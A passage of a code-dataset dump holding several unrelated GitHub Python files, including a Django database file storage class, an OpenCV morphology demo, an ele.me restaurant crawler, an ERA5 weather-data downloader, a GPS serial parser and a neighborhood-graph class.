name}).delete()\n\n def exists(self, name):\n if os.sep != '/': # Windows fix (see a6d4707) # pragma: no cover\n name = name.replace('/', os.sep)\n try:\n storage_attrs = self._get_storage_attributes(name)\n except NameException:\n return False\n model_class_path = storage_attrs['model_class_path']\n filename_field = storage_attrs['filename_field']\n\n model_cls = self._get_model_cls(model_class_path)\n return model_cls.objects.filter(\n **{filename_field: name}\n ).exists()\n\n def 
url(self, name):\n        _url = reverse('db_file_storage.download_file')\n        return _url + '?' + urlencode({'name': name})\n\n\nclass FixedModelDatabaseFileStorage(DatabaseFileStorage):\n    \"\"\"File storage system that saves files in the database.\n\n    Intended for use without Models' FileFields, e.g. with Form Wizards.\n    Uses a fixed Model to store all the saved files.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        try:\n            self.model_class_path = kwargs.pop('model_class_path')\n            self.content_field = kwargs.pop('content_field')\n            self.filename_field = kwargs.pop('filename_field')\n            self.mimetype_field = kwargs.pop('mimetype_field')\n        except KeyError:\n            raise KeyError(\n                \"keyword args 'model_class_path', 'content_field', \"\n                \"'filename_field' and 'mimetype_field' are required.\"\n            )\n        super(FixedModelDatabaseFileStorage, self).__init__(*args, **kwargs)\n\n    def _get_storage_attributes(self, name):\n        return {\n            'model_class_path': self.model_class_path,\n            'content_field': self.content_field,\n            'filename_field': self.filename_field,\n            'mimetype_field': self.mimetype_field,\n            'filename': name,\n        }\n","repo_name":"victor-o-silva/db_file_storage","sub_path":"db_file_storage/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"37"}
+{"seq_id":"16276222423","text":"\n# In the erosion operation you must define the kernel size and the number of iterations; the more iterations and the larger the kernel, the stronger the erosion\nimport cv2\nimport numpy as np\n# img=np.zeros((5,5),np.uint8)\n# img[1:4,1:4]=1\n# kernel=np.ones((3,1),np.uint8)\n# erosion=cv2.erode(img,kernel)\n# print(\"img=\\n\",img)\n# print(\"kernel=\\n\",kernel)\n# print(\"erosion=\\n\",erosion)\n\no=cv2.imread(\"erode.bmp\",cv2.IMREAD_UNCHANGED)\n\nkernel=np.ones((5,5),np.uint8)\n\nerosion=cv2.erode(o,kernel)\n\ncv2.imshow(\"original\",o)\n\ncv2.imshow(\"erosion\",erosion)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n\n# Dilation works exactly the opposite way to erosion.\nimg=np.zeros((5,5),np.uint8)\nimg[2:3,1:4]=1\nkernel=np.ones((3,1),np.uint8)\ndilation=cv2.dilate(img,kernel)\nprint(\"img=\\n\",img)\nprint(\"kernel=\\n\",kernel)\nprint(\"dilation\\n\",dilation)\n\n\n##\nimport cv2\n\nimport numpy as np\n\no=cv2.imread(\"dilation.bmp\",cv2.IMREAD_UNCHANGED)\n\nkernel=np.ones((9,9),np.uint8)\n\ndilation=cv2.dilate(o,kernel)\n\ncv2.imshow(\"original\",o)\n\ncv2.imshow(\"dilation\",dilation)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter8/demo_erode.py","file_name":"demo_erode.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"44268564327","text":"# coding=utf-8\n\nimport requests\nfrom geohash2 import geohash\n\nfrom pear.utils.const import SOURCE, HOT_CITIES\nfrom pear.utils.logger import logger\nfrom pear.utils.mem_cache import mem_cache\nfrom pear.web.controllers.comm import save_ele_restaurants\n\n\ndef get_ele_msg_code(mobile_phone, captcha_value='', captch_hash=''):\n    url = 'https://h5.ele.me/restapi/eus/login/mobile_send_code'\n    payload = {\n        'mobile': mobile_phone,\n        'captcha_value': captcha_value,\n        'captcha_hash': captch_hash\n    }\n    headers = {\n        'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n        'origin': 'https://h5.ele.me',\n        'referer': 'https://h5.ele.me/login/'\n    }\n    token = ''\n    try:\n        resp = requests.post(url, json=payload, headers=headers, timeout=5)\n        data = resp.json()\n        if resp.status_code == 200:\n            token = data.get('validate_token', '')\n            return True, token, ''\n        msg = data.get('message')\n        return False, token, msg\n    except Exception as e:\n        msg = str(e)\n        return False, token, msg\n\n\ndef get_ele_captchas(mobile_phone):\n    url = 'https://www.ele.me/restapi/eus/v3/captchas'\n    payload = {\n        'captcha_str': mobile_phone\n    }\n    headers = {\n        'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n        'origin': 'https://h5.ele.me',\n        'referer': 'https://h5.ele.me/login/'\n    }\n    try:\n        resp = requests.post(url, json=payload, headers=headers, timeout=5)\n        if resp.status_code == 200:\n            data = resp.json()\n            return True, data.get('captcha_image'), data.get('captcha_hash')\n        logger.error(u'get_ele_pic_failed: {}'.format(resp.content))\n    except Exception as e:\n        logger.error(e, exc_info=True)\n    return False, None, None\n\n\ndef login_ele_by_mobile(mobile_phone, sms_code, sms_token):\n    url = 'https://h5.ele.me/restapi/eus/login/login_by_mobile'\n    payload = {\n        \"mobile\": mobile_phone,\n        \"validate_code\": sms_code,\n        \"validate_token\": sms_token\n    }\n    headers = {\n        'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36',\n        'origin': 'https://h5.ele.me',\n        'referer': 'https://h5.ele.me/login/'\n    }\n    try:\n        resp = requests.post(url, json=payload, headers=headers, timeout=5)\n        if resp.status_code == 200:\n            return True, resp.cookies, resp.text\n        return False, resp.cookies, resp.text\n    except Exception as e:\n        logger.error(e, exc_info=True)\n        return False, None, str(e)\n\n\n@mem_cache()\ndef get_ele_city_list():\n    url = 'https://www.ele.me/restapi/shopping/v1/cities'\n    try:\n        resp = requests.get(url, timeout=5)\n        if resp.status_code == 200:\n            data = resp.json()\n            cities = []\n            for k, v in data.items():\n                item = [i for i in data[k] if i['name'] in HOT_CITIES]\n                cities.extend(item)\n            return cities\n    except Exception as e:\n        logger.error(e, exc_info=True)\n\n\n@mem_cache()\ndef search_ele_address(key, latitude, longitude):\n    url = 'https://www.ele.me/restapi/v2/pois'\n    _geohash = geohash.encode(latitude=float(\n        latitude), longitude=float(longitude))\n    logger.info('geohash: {}'.format(_geohash))\n    params = {\n        'extras[]': 'count',\n        'geohash': _geohash,\n        'keyword': key,\n        'limit': 20,\n        'type': 'nearby'\n    }\n    try:\n        resp = requests.get(url, timeout=5, params=params)\n        if resp.status_code == 200:\n            data = resp.json()\n            return data\n    except Exception as e:\n        logger.error(e, exc_info=True)\n\n\ndef get_ele_restaurants(geohash, latitude, longitude, cookies, offset=0, limit=24):\n    url = 'https://www.ele.me/restapi/shopping/restaurants'\n    params = {\n        'geohash': geohash,\n        'latitude': latitude,\n        'longitude': longitude,\n        'offset': offset,\n        'limit': limit,\n        'extras[]': 'activities'\n    }\n    try:\n        resp = requests.get(url, timeout=5, params=params, cookies=cookies)\n        logger.info(resp.headers)\n        if resp.status_code == 200:\n            data = resp.json()\n            for item in data:\n                image_path = item['image_path']\n                save_ele_restaurants.put(\n                    source=SOURCE.ELE,\n                    restaurant_id=item['id'],\n                    name=item['name'],\n                    sales=item['recent_order_num'],\n                    arrive_time=item['order_lead_time'],\n                    send_fee=item['float_delivery_fee'],\n                    score=item['rating'],\n                    latitude=item['latitude'],\n                    longitude=item['longitude'],\n                    image='https://fuss10.elemecdn.com/{}/{}/{}.{}'.format(image_path[0:1], image_path[1:3],\n                                                                           image_path[3:],\n                                                                           image_path[32:])\n                )\n            return data\n    except Exception as e:\n        logger.error(e, 
exc_info=True)\n","repo_name":"mywenchang/RestaurantCrawler-Pear","sub_path":"pear/web/controllers/ele_crawler_controller.py","file_name":"ele_crawler_controller.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14581164649","text":"\"\"\"weather_prediction URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n#from django.contrib import admin\n# from django.conf.urls import url\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(r'home/', views.home, name='home'),\n\n # Weather prediction Starts from here\n path(r'weather_predict/', views.weather_prediction, name='weather_predict'),\n path(r'weather_predict/result/', views.weather_result, ),\n # Weather prediction End here \n\n # About us start\n path(r'about/', views.about, name='about')\n]\n","repo_name":"parthapaulpartha/Weather","sub_path":"weather_prediction/weather_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38823302241","text":"#! /usr/bin/env python3\n\n# This next line will abort in any version earlier than Python 3.6:\nf'This script requires Python 3.6 or newer.'\n\nimport time\nimport subprocess\nimport contextlib\nimport os\nimport tempfile\nimport getopt\nimport re\nimport logging\nimport datetime\nimport sys\n\ntry:\n import cdsapi\nexcept ImportError as ie:\n sys.stderr.write(\"\"\"You are missing the cdsapi module!\nYou must install it to run this script.\n\n pip install cdsapi --user\n\nYou will also need to register on the cdsapi website, sign the ERA5\nlicense agreement, get a key, and put the key in your ~/.cdsapi file.\n\"\"\")\n\nimport produtil.setup, produtil.fileop, produtil.locking\n\n# Constants\nUTILITY_NAME = 'hafs_era5_download'\nVERSION_STRING = '0.0.1'\nLOGGING_DOMAIN = UTILITY_NAME\nDATASET = 'reanalysis-era5-single-levels'\nPRODUCT_TYPE = 'reanalysis'\nVARIABLES = [\n '10m_u_component_of_wind', '10m_v_component_of_wind', '2m_dewpoint_temperature',\n '2m_temperature', 'convective_precipitation', 'convective_snowfall',\n 'large_scale_precipitation', 'large_scale_snowfall', 'mean_sea_level_pressure',\n 'near_ir_albedo_for_diffuse_radiation', 'near_ir_albedo_for_direct_radiation',\n 'uv_visible_albedo_for_diffuse_radiation', 'uv_visible_albedo_for_direct_radiation',\n 'surface_latent_heat_flux', 'surface_sensible_heat_flux',\n 'surface_solar_radiation_downwards', 'surface_thermal_radiation_downwards',\n 'surface_pressure', 'total_precipitation', 'skin_temperature',\n 'eastward_turbulent_surface_stress', 'northward_turbulent_surface_stress',\n 'surface_net_solar_radiation', 'surface_net_thermal_radiation'\n]\nFILE_FORMAT = 'netcdf'\nCYCLING_INTERVAL = datetime.timedelta(seconds=3600*24)\nEPSILON = datetime.timedelta(seconds=5) # epsilon for time comparison: five seconds\n\n# Non-constant 
globals:\ndayset=set() # list of YYYYMMDD strings\nhappy=True # False = something failed\nfilename_format = 'ERA5_%Y%m%d'\nswap_latitudes=True\n\ndef usage(why=None):\n    print(f'''Synopsis: {UTILITY_NAME} [options] day [day [...]]\n\nDownloads the listed days of data. Days can be specified as:\n    20210815 = specify one day: August 15, 2021\n    20210815-20210819 = specify a range of days: August 15th to 19th, 2021\n    2018 = specify an entire year (2018)\n\nOptions:\n    -q | --quiet = log only warnings and errors\n    -v | --verbose = log all messages\n    -n | --no-invertlat = do not run \"cdo invertlat\" on downloaded files\n    -F format | --format format = filename format as in strftime(3)\n    -i | --invertlat = DO run \"cdo invertlat\". This is the default\n    --version = print {UTILITY_NAME} {VERSION_STRING}\n    --help = this message\n\nFormat example: ERA5_%Y%m%d = ERA5_20210815\nScript will automatically append \".nc\"\n''')\n    if why:\n        sys.stderr.write(f'SCRIPT IS ABORTING BECAUSE: {why}\\n')\n        return 1\n    return 0\n\n# Function that makes the singleton for cdsapi client:\n_client = None\ndef client():\n    global _client\n    if not _client:\n        logger.info('creating cdsapi client')\n        _client=cdsapi.Client()\n    return _client\n\n# Tell CDO to flip latitudes in a NetCDF file:\ndef cdo_swap_latitudes(filename_in,filename_out):\n    logger.info('Flip latitudes in \"'+str(filename_in)+'\" and write to \"'+str(filename_out)+'\"')\n    cmd = [ 'cdo', 'invertlat', filename_in, filename_out ]\n    logger.info(f'''Run \"{'\" \"'.join(cmd) }\"''')\n    result = subprocess.run(cmd)\n    result.check_returncode()\n\ndef quiet_remove(filename):\n    with contextlib.suppress(FileNotFoundError):\n        os.remove(filename)\n\n# The meat of the program: retrieve a file\ndef request(when):\n    filename_base = when.strftime(filename_format)\n    filename_download = filename_base+'_download.nc'\n    filename_invert = filename_base+'_invert.nc'\n    filename_lock = filename_base+'.lock'\n    filename_final = filename_base+'.nc'\n    if os.path.exists(filename_final):\n        logger.info(filename_final+': already exists. Skipping.')\n        return\n    with produtil.locking.LockFile(filename_lock,logger):\n        try:\n            if os.path.exists(filename_final):\n                logger.info(filename_final+': already exists (after lock). Skipping.')\n                return\n            quiet_remove(filename_download)\n            quiet_remove(filename_invert)\n            logger.info(filename_download+': retrieve '+str(when)+'...')\n            request = {\n                'product_type': PRODUCT_TYPE,\n                'variable': VARIABLES,\n                'year': '%04d'%int(when.year),\n                'month': [ '%02d'%int(when.month) ],\n                'day': [ '%02d'%int(when.day) ],\n                'time': [ '%02d'%hour for hour in range(24) ],\n                'format': FILE_FORMAT,\n            }\n            # super-wordy debugging: logger.debug(filename_download+': request is '+str(request))\n            client().retrieve(DATASET,request,filename_download)\n            filename_copy=filename_download\n            if swap_latitudes:\n                cdo_swap_latitudes(filename_download,filename_invert)\n                filename_copy=filename_invert\n            produtil.fileop.deliver_file(filename_copy,filename_final,logger=logger,\n                                         keep=False,verify=False,moveok=True,force=True)\n            quiet_remove(filename_download)\n            quiet_remove(filename_invert)\n            quiet_remove(filename_lock)\n        except Exception as e:\n            quiet_remove(filename_download)\n            quiet_remove(filename_invert)\n            raise e\n\n# Parse arguments and initialize logging:\nlog_level = logging.INFO\noptlist,args = getopt.getopt(sys.argv[1:],'qveniF:',[\n    'version','help','verbose','quiet','invertlat','no-invertlat','format='])\nif len(args)<1:\n    exit(usage(\"No arguments provided!\"))\nfor optarg in optlist:\n    if optarg[0] in ['-q', '--quiet']:\n        log_level = logging.WARNING\n    elif optarg[0] in ['-v', '--verbose']:\n        log_level = logging.DEBUG\n    elif optarg[0] in ['-i', '--invertlat']:\n        swap_latitudes = True\n    elif optarg[0] in ['-n', '--no-invertlat']:\n        swap_latitudes = False\n    elif optarg[0] in ['-F', '--format']:\n        filename_format = optarg[1]\n    elif optarg[0]=='--help':\n        exit(usage())\n    elif optarg[0]=='--version':\n        print(UTILITY_NAME+' '+VERSION_STRING)\n        exit(0)\nlogger = logging.getLogger(LOGGING_DOMAIN)\n\nprodutil.setup.setup(level=log_level,send_dbn=False)\n\n# Parse the days. This loop was modified from run_hafs.py:\nfor arg in args:\n    if re.match('\\A\\d{8}\\Z',arg):\n        logger.info('single date/time')\n        # Single date/time\n        dayset.add(arg)\n    elif re.match('\\A\\d{4}\\Z',arg):\n        logger.info('year')\n        # Year\n        start=datetime.datetime(int(arg,10),1,1,0,0,0)\n        end=datetime.datetime(int(arg,10),12,31,23,59,0)\n        now=start\n        while now<end:\n            dayset.add(now.strftime('%Y%m%d'))\n            now+=CYCLING_INTERVAL\n    elif re.match('\\A\\d{8}-\\d{8}\\Z',arg):\n        logger.info('range of dates')\n        # Inclusive range of days\n        first,last=arg.split('-')\n        start=datetime.datetime.strptime(first,'%Y%m%d')\n        end=datetime.datetime.strptime(last,'%Y%m%d')+EPSILON\n        now=start\n        while now<end:\n            dayset.add(now.strftime('%Y%m%d'))\n            now+=CYCLING_INTERVAL\n    else:\n        exit(usage('Unrecognized argument: '+arg))\n\n# Retrieve every requested day, retrying failed days until all succeed:\ndaylist=sorted(dayset)\niloop=0\nwhile daylist:\n    while iloop<len(daylist):\n        day=daylist[iloop]\n        try:\n            when=datetime.datetime.strptime(day,'%Y%m%d')\n            request(when)\n            daylist.remove(day)\n            if iloop>=len(daylist):\n                logger.info(f'{day}: sleep for a little while... 
30 second snooze...')\n time.sleep(30)\n logger.info(f'{day}: done sleeping.')\n iloop=0\n except Exception as ex: # Unfortunately, cdsapi raises Exception\n happy = False\n logger.error(f'CDSAPI failed to download day {day}: {ex}',exc_info=ex)\n\n# Exit 0 on success, 1 on failure:\nexit( 0 if happy else 1 )\n","repo_name":"hafs-community/HAFS","sub_path":"ush/cdeps_utils/hafs_era5_download.py","file_name":"hafs_era5_download.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"70597549548","text":"from flask_wizard import response\nfrom urllib.parse import quote\n\nimport json\nimport math\nimport operator\nimport os\n\ndef link_account(session):\n config_path = os.path.join(os.getcwd(),'config.json')\n with open(config_path,\"r\") as jsonFile:\n config = json.load(jsonFile)\n frontend = config[\"frontend\"]\n url = frontend + \"/login?uid=\"+ str(session['user']['id'])\n course_obj = [response.template_element(\n title=\"Login\",\n action=response.actions(type=\"web_url\",url=url),\n buttons=[response.button(type=\"web_url\",url=url,title=\"Authenticate\")]\n )]\n response.send(session,\"linking it up\")\n template = response.template(type=\"generic\",elements=course_obj)\n response.send(session,template)","repo_name":"GanadiniAkshay/Flask-Wizard","sub_path":"actions/link_account.py","file_name":"link_account.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73174933228","text":"import datetime\nimport time\nimport serial\nfrom mat.dds_states import STATE_DDS_BLE_APP_GPS_ERROR_POSITION, \\\n STATE_DDS_NOTIFY_BOAT_NAME, STATE_DDS_NOTIFY_GPS, \\\n STATE_DDS_NOTIFY_GPS_BOOT\nfrom mat.gps import PORT_CTRL, PORT_DATA\nfrom mat.utils import linux_is_rpi, linux_set_datetime\nfrom settings import ctx as cu\nfrom settings.ctx import hook_gps_dummy_measurement\nfrom tzlocal import get_localzone\nfrom mat.ddh_shared import send_ddh_udp_gui as _u, dds_get_json_vessel_name\nfrom dds.logs import lg_gps as lg\n\n\n_g_ts_told_vessel = 0\n_g_ts_cached_gps_valid_for = 0\n_g_cached_gps = None\n_g_ts_gga = 0\n\n\nPERIOD_GPS_CACHE_VALID_SECS = 30\nPERIOD_GPS_TELL_NUM_SATS_SECS = 300\nPERIOD_GPS_TELL_VESSEL_SECS = 30\nPERIOD_GPS_AT_BOOT_SECS = 300\n\n\ndef gps_get_cache():\n return _g_cached_gps\n\n\ndef _coord_decode(coord: str):\n # src: stackoverflow 18442158 latitude format\n\n x = coord.split(\".\")\n head = x[0]\n deg = head[:-2]\n minutes = '{}.{}'.format(head[-2:], x[1])\n decimal = int(deg) + float(minutes) / 60\n return decimal\n\n\ndef _gps_parse_rmc_frame(data: bytes):\n \"\"\" grab a long comma-separated string, parse fields \"\"\"\n\n if b'GPRMC' not in data:\n return\n\n data = data.decode()\n s = '$GPRMC' + data.split('$GPRMC')[1].split('\\r')[0]\n s = s.split(\",\")\n if s[2] == 'V':\n return\n\n _t = s[1][0:2] + \":\" + s[1][2:4] + \":\" + s[1][4:6]\n _day = s[9][0:2] + \"/\" + s[9][2:4] + \"/\" + s[9][4:6]\n\n # lat, direction, lon, direction, speed, course, variation\n lat = _coord_decode(s[3])\n dir_lat = s[4]\n lon = _coord_decode(s[5])\n dir_lon = s[6]\n speed = s[7]\n _course = s[8]\n # variation = s[10]\n\n # GPS date and time are UTC\n fmt = '{} {}'.format(_day, _t)\n gps_time = datetime.datetime.strptime(fmt, '%d/%m/%y %H:%M:%S')\n\n # display\n # print('time {} date {} lat {} lon {}'.format(_t, _day, lat, lon))\n # print('speed {} mag_var {} course {}'.format(speed, variation, 
_course))\n\n # return some strings\n lat = lat * 1 if dir_lat == 'N' else lat * -1\n lon = lon * 1 if dir_lon == 'E' else lon * -1\n\n # checksum skipping initial '$'\n cs_in = data.split('*')[1][:2]\n cs_calc = 0\n for c in data[1:].split('*')[0]:\n cs_calc ^= ord(c)\n cs_calc = '{:02x}'.format(int(cs_calc))\n if cs_in != cs_calc.upper():\n return None\n\n # everything went ok\n return lat, lon, gps_time, speed\n\n\ndef _gps_parse_gga_frame(data: bytes):\n \"\"\" grab a long comma-separated string, parse fields \"\"\"\n\n if b'GPGGA' not in data:\n return\n\n # $GPGGA, time, lat, N, lon, W, 1, 07, 1.0, 9.0, M, , , , crc\n data = data.decode()\n\n # log satellites but not always\n global _g_ts_gga\n try:\n n = int(data[7])\n now = time.perf_counter()\n if now > _g_ts_gga:\n # todo > tell this to GUI\n lg.a('{} satellites in view'.format(n))\n _g_ts_gga = now + PERIOD_GPS_TELL_NUM_SATS_SECS\n\n except (Exception, ) as ex:\n lg.a('error: parse GGA frame {}'.format(ex))\n\n\ndef gps_connect_shield():\n\n if not cu.cell_shield_en:\n lg.a('CELL shield set False, so no GPS to configure')\n return\n\n if hook_gps_dummy_measurement:\n lg.a('debug: dummy GPS connected, not configuring it')\n return\n\n sp = serial.Serial(PORT_CTRL, baudrate=115200,\n timeout=1, rtscts=True, dsrdtr=True)\n sp.write(b'AT+QGPS=1\\r')\n ans = sp.readlines()\n rv = (b'+CME ERROR: 504\\r\\n' in ans) or b'OK\\r\\n' in ans\n lg.a('gps_connect_shield answer: {}'.format(ans))\n sp.close()\n time.sleep(0.5)\n return rv\n\n\ndef _gps_measure():\n \"\"\"\n returns (lat, lon, dt object, speed) or None\n for a dummy or real GPS measurement\n \"\"\"\n\n # hooks\n if cu.hook_gps_error_measurement_forced:\n _u(STATE_DDS_BLE_APP_GPS_ERROR_POSITION)\n lg.a('debug: HOOK_GPS_ERROR_MEASUREMENT_FORCED')\n return\n\n if cu.hook_gps_dummy_measurement:\n lg.a('debug: HOOK_GPS_DUMMY_MEASUREMENT')\n time.sleep(.5)\n lat = '{:+.6f}'.format(38.000000000)\n lon = '{:+.6f}'.format(-83.0)\n return lat, lon, datetime.datetime.utcnow(), 1\n\n # real GPS measure\n sp = serial.Serial(PORT_DATA, baudrate=115200, timeout=0.2, rtscts=True, dsrdtr=True)\n till = time.perf_counter() + 2\n sp.flushInput()\n\n # todo > see if these 2 hurt\n sp.readall()\n sp.flushInput()\n\n global _g_ts_cached_gps_valid_for\n global _g_cached_gps\n now = time.perf_counter()\n\n while 1:\n if time.perf_counter() > till:\n break\n\n b = sp.readall()\n # _gps_parse_gga_frame(b)\n g = _gps_parse_rmc_frame(b)\n if g:\n g = list(g)\n lat = '{:+.6f}'.format(g[0])\n lon = '{:+.6f}'.format(g[1])\n if g[3] == '':\n g[3] = '0'\n # float, float, datetime UTC, speed\n _u('{}/{},{}'.format(STATE_DDS_NOTIFY_GPS, lat, lon))\n _g_ts_cached_gps_valid_for = now + PERIOD_GPS_CACHE_VALID_SECS\n _g_cached_gps = lat, lon, g[2], float(g[3])\n return g\n\n if _g_ts_cached_gps_valid_for == 0:\n lg.a('failed, and no cache ever yet')\n return\n\n # failed, but we have GPS cache and is valid\n now = time.perf_counter()\n if now < _g_ts_cached_gps_valid_for:\n lat, lon, dt_utc, speed = _g_cached_gps\n _u('{}/{},{}'.format(STATE_DDS_NOTIFY_GPS, lat, lon))\n lg.a('using cached position {}, {}'.format(lat, lon))\n return _g_cached_gps\n\n lg.a('failed, and cache is too old')\n _g_cached_gps = '', '', None, float(0)\n\n # tell GUI\n _u(STATE_DDS_BLE_APP_GPS_ERROR_POSITION)\n\n\ndef gps_measure():\n try:\n return _gps_measure()\n except (Exception, ) as ex:\n lg.a('error: {}'.format(ex))\n\n\ndef gps_clock_sync_if_so(dt_gps_utc):\n\n utc_now = datetime.datetime.utcnow()\n diff_secs = abs((dt_gps_utc - 
utc_now).total_seconds())\n    if diff_secs < 60:\n        return\n    lg.a('debug: gps_clock_sync_diff_secs = {}'.format(diff_secs))\n\n    # use GPS time to sync local clock\n    assert type(dt_gps_utc) is datetime.datetime\n    z_my = get_localzone()\n    z_utc = datetime.timezone.utc\n    dt_my = dt_gps_utc.replace(tzinfo=z_utc).astimezone(tz=z_my)\n    t = str(dt_my)[:-6]\n    if not linux_is_rpi():\n        # will not set date on non-rpi platforms\n        return\n    return linux_set_datetime(t)\n\n\ndef gps_wait_for_it_at_boot():\n\n    # Wikipedia: GPS-Time-To-First-Fix for cold start is typ.\n    # 2 to 4 minutes, warm <= 45 secs, hot <= 22 secs\n\n    till = time.perf_counter() + PERIOD_GPS_AT_BOOT_SECS\n    s = 'wait up to {} seconds for GPS at boot'\n    lg.a(s.format(PERIOD_GPS_AT_BOOT_SECS))\n\n    while 1:\n        t = time.perf_counter()\n        if t > till:\n            return '', '', None, 0\n\n        # todo > do this state at GUI\n        t = int(till - time.perf_counter())\n        _u('{}/{}'.format(STATE_DDS_NOTIFY_GPS_BOOT, t))\n\n        g = gps_measure()\n        if g:\n            return g\n        lg.a('gps_wait_at_boot returned {}'.format(g))\n        s = '{} seconds left to wait for GPS at boot'\n        lg.a(s.format(t))\n        time.sleep(1)\n\n\ndef gps_tell_vessel_name():\n    global _g_ts_told_vessel\n    now = time.perf_counter()\n    if now < _g_ts_told_vessel:\n        return\n    _g_ts_told_vessel = now + PERIOD_GPS_TELL_VESSEL_SECS\n    v = dds_get_json_vessel_name()\n    _u('{}/{}'.format(STATE_DDS_NOTIFY_BOAT_NAME, v))\n\n\nif __name__ == '__main__':\n    gps_connect_shield()\n    while 1:\n        m = gps_measure()\n        print(m)\n","repo_name":"xhx509/dds","sub_path":"dds/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":7575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22302451875","text":"inventory = {\n'gold' : 500,\n'pouch' : ['flint', 'twine', 'gemstone'],\n'backpack' : ['xylophone', 'dagger', 'bedroll', 'bread loaf']\n}\n\ninventory['pocket'] = ['seashell', 'strange','berry','lint'] # CREATE\ninventory[\"backpack\"].remove('dagger') #DELETE\ninventory['gold'] += 50\n\n\nprint(inventory)\n\n","repo_name":"nerissavu/D4E-TC-NGA","sub_path":"Session4/hw/still_exercise1.py","file_name":"still_exercise1.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"75036645867","text":"\"\"\"\n    This module abstracts some of the ugliness of interfacing with C++\n    from Python by providing an easy-to-use interface to the\n    Neighborhood Graph Library (NGL) originally developed by Carlos\n    Correa.\n\"\"\"\nfrom nglpy import utils\n\nfrom .ngl import nglGraph, vectorDouble, vectorInt\n\n\nclass PrebuiltGraph(nglGraph):\n    \"\"\"A neighborhood graph that represents the connectivity of a given\n    data matrix.\n\n    Attributes:\n        None\n    \"\"\"\n\n    def __init__(self, edges=None, **kwargs):\n        \"\"\"\n        Constructor for the Prebuilt Graph class that takes a list of edges\n        and as such should only be used for one dataset.\n\n        Parameters\n        ----------\n        edges : list[tuple(int,int)]\n            The predefined list of edges connecting a point set\n\n        kwargs\n            Forward-compatible catch-all dictionary that will allow us to throw\n            a warning for every named parameter not available in this version.\n\n        Returns\n        -------\n        None\n\n        \"\"\"\n\n        utils.consume_extra_args(kwargs)\n        self.edges = edges\n\n    def build(self, X):\n        rows = len(X)\n        cols = len(X[0]) if rows > 0 else 0\n\n        flattened_X = [xij for Xi in X for xij in Xi]\n\n        # use pairs to prevent duplicates\n        # As seen here: https://bit.ly/1pUtpLh\n        seen = set()\n        pairs 
= [\n x for x in self.edges if not (x in seen or x[::-1] in seen or seen.add(x))\n ]\n edgeList = []\n for edge in pairs:\n edgeList.append(int(edge[0]))\n edgeList.append(int(edge[1]))\n edges = vectorInt(edgeList)\n\n super(PrebuiltGraph, self).__init__(\n vectorDouble(flattened_X),\n rows,\n cols,\n \"none\",\n rows,\n 0,\n edges,\n False,\n )\n\n def neighbors(self, idx=None):\n \"\"\"Returns the list of neighbors associated to a particular\n index in the dataset, if one is provided, otherwise a full\n dictionary is provided relating each index to a set of\n connected indices.\n\n Args:\n idx: (optional) a single index of the point in the input\n data matrix for which we want to retrieve neighbors.\n\n Returns:\n A list of indices connected to either the provided input\n index, or a dictionary where the keys are the indices in the\n whole dataset and the values are sets of indices connected\n to the key index.\n \"\"\"\n if idx is None:\n return dict(self.full_graph())\n else:\n return list(super(PrebuiltGraph, self).get_neighbors(int(idx)))\n","repo_name":"maljovec/nglpy","sub_path":"nglpy/PrebuiltGraph.py","file_name":"PrebuiltGraph.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"10659174235","text":"import time\r\nfrom threading import Thread\r\nfrom cellworld import *\r\nfrom Agent import Agent, AgentData, AgentAction\r\n\r\nclass Model:\r\n\r\n def __init__(self,\r\n pworld: World,\r\n freq: int = 100,\r\n real_time: bool = False):\r\n self.real_time = real_time\r\n self.world = pworld\r\n self.agents = dict()\r\n self.agents_data = dict()\r\n self.display = Display(self.world, animated=True, fig_size=(6, 6))\r\n self.thread = None\r\n self.running = False\r\n self.interval = 1 / freq\r\n self.arena_polygon = Polygon(self.world.implementation.space.center, 6,\r\n self.world.implementation.space.transformation.size / 2,\r\n self.world.implementation.space.transformation.rotation)\r\n self.occlusions_polygons = Polygon_list.get_polygons([c.location for c in self.world.cells.occluded_cells()],\r\n 6,\r\n self.world.implementation.cell_transformation.size / 2 * 1.05,\r\n 